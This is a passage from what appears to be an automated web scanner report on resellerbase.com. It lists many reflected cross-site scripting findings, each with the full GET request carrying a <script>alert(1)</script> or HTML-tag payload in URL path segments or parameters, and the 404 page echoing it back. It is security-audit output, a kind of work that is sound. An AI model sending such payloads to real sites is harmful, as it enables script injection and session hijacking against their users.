Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c81e8<a>3635aadcec4 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/search.php?keyword=search...c81e8<a>3635aadcec4&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/search.php?keyword=search...c81e8<a>3635aadcec4&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5573. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 31f67<script>alert(1)</script>b2ac89c0891 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&31f67<script>alert(1)</script>b2ac89c0891=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&31f67<script>alert(1)</script>b2ac89c0891=1 was not found on this server.</p>
...[SNIP]...

2.5574. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b1de3<a>7a2bfc8ba8c was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2b1de3<a>7a2bfc8ba8c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2b1de3<a>7a2bfc8ba8c was not found on this server.</p>
...[SNIP]...

2.5575. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3deed<script>alert(1)</script>2af6d1ed791 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service3deed<script>alert(1)</script>2af6d1ed791/web-hosting/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service3deed<script>alert(1)</script>2af6d1ed791/web-hosting/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5576. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fa8a0<script>alert(1)</script>72453c720f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hostingfa8a0<script>alert(1)</script>72453c720f2/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hostingfa8a0<script>alert(1)</script>72453c720f2/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5577. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d5bed<script>alert(1)</script>11cd06a2295 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themesd5bed<script>alert(1)</script>11cd06a2295/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themesd5bed<script>alert(1)</script>11cd06a2295/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5578. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5b505<script>alert(1)</script>105957bb74f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos5b505<script>alert(1)</script>105957bb74f/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos5b505<script>alert(1)</script>105957bb74f/images/review/ was not found on this server.</p>
...[SNIP]...

2.5579. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 46644<script>alert(1)</script>892e74c2297 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images46644<script>alert(1)</script>892e74c2297/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images46644<script>alert(1)</script>892e74c2297/review/ was not found on this server.</p>
...[SNIP]...

2.5580. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2aa36<script>alert(1)</script>c6fe3bf9322 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/review2aa36<script>alert(1)</script>c6fe3bf9322/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/review2aa36<script>alert(1)</script>c6fe3bf9322/ was not found on this server.</p>
...[SNIP]...

2.5581. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 886de<script>alert(1)</script>97d189875ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/review/?886de<script>alert(1)</script>97d189875ae=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/review/?886de<script>alert(1)</script>97d189875ae=1 was not found on this server.</p>
...[SNIP]...

2.5582. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload beb15<script>alert(1)</script>7c599ec0822 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicebeb15<script>alert(1)</script>7c599ec0822/web-hosting/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicebeb15<script>alert(1)</script>7c599ec0822/web-hosting/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5583. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d15e9<script>alert(1)</script>91e986188c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hostingd15e9<script>alert(1)</script>91e986188c8/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hostingd15e9<script>alert(1)</script>91e986188c8/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5584. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6227e<script>alert(1)</script>ae48ed2d683 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes6227e<script>alert(1)</script>ae48ed2d683/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes6227e<script>alert(1)</script>ae48ed2d683/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5585. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 417d0<script>alert(1)</script>1ac3b571b70 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos417d0<script>alert(1)</script>1ac3b571b70/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos417d0<script>alert(1)</script>1ac3b571b70/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5586. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 474ea<script>alert(1)</script>305dc6046e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images474ea<script>alert(1)</script>305dc6046e/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images474ea<script>alert(1)</script>305dc6046e/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5587. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload aa5fe<script>alert(1)</script>2b59dede67f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/reviewaa5fe<script>alert(1)</script>2b59dede67f/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/reviewaa5fe<script>alert(1)</script>2b59dede67f/0.gif was not found on this server.</p>
...[SNIP]...

2.5588. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload a964b<script>alert(1)</script>a61ef6fefd was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/review/0.gifa964b<script>alert(1)</script>a61ef6fefd HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/review/0.gifa964b<script>alert(1)</script>a61ef6fefd was not found on this server.</p>
...[SNIP]...

2.5589. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 807af<script>alert(1)</script>ae132008541 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/review/0.gif?807af<script>alert(1)</script>ae132008541=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/review/0.gif?807af<script>alert(1)</script>ae132008541=1 was not found on this server.</p>
...[SNIP]...

2.5590. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/5.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 45a44<script>alert(1)</script>79c5e2b46dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service45a44<script>alert(1)</script>79c5e2b46dc/web-hosting/themes/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:57 GMT
Server: Apache/2
